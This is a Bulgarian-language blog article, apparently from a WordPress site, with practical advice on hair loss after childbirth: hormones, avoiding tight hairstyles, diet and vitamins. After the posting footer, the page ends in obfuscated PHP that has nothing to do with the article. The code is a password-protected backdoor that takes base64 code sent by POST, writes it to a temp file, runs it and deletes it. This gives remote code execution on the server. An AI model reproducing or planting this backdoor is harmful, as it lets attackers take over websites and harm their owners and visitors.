Как да избегнем косопада след раждане | Косопад

Как да избегнем косопада след раждане

Ако имате косопад след раждането, не се притеснявайте. Случва се на много жени няколко месеца след като са родили. По време на бременността в тялото ви има повече хормони, отколкото обикновено. Те пречат на космите да влязат в период на застой, когато растежът спира и те окапват.

раждане

След раждането хормоните се нормализират и косата ви изведнъж влиза в този етап, което означава, че започва да пада. Въпреки че косопада намалява от само себе си, балансът се възстановява след година. Въпреки това, има някои неща, които можете да направите, за да подобрите състоянието на косата си.

Не изтезавайте косата си. Избягвайте някои прически след раждането. Всяка прическа, която поставя косата ви под допълнително напрежение, например – стегнати плитки и конски опашки, могат да усилят косопада. Използвайтераждане2 гребени с широки зъби, не се решете, докато са мокри, не употребявайте често преса и маша.

Яжте повече плодове и зеленчуци. Съдържат флавоноиди и антиоксиданти, които могат да ви предпазят от косопад след раждане, или поне да е по- умерен. Тези вещества предпазват космения корен и помагат за растежа на косата.

Взимайте достатъчно витамини. По време на бременността тялото ви се нуждае от допълнителни количества. Ако имате недостиг на витамини, това веднага ще се отрази на състоянието на косата ви. Тялото ще започне да изсмуква витамини, необходими за растежа на косата, за други свои нужди. Взимайте допълнително цинк, фолиева киселина и витамини В комплекс.

15. януари 2014 16:32:16 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}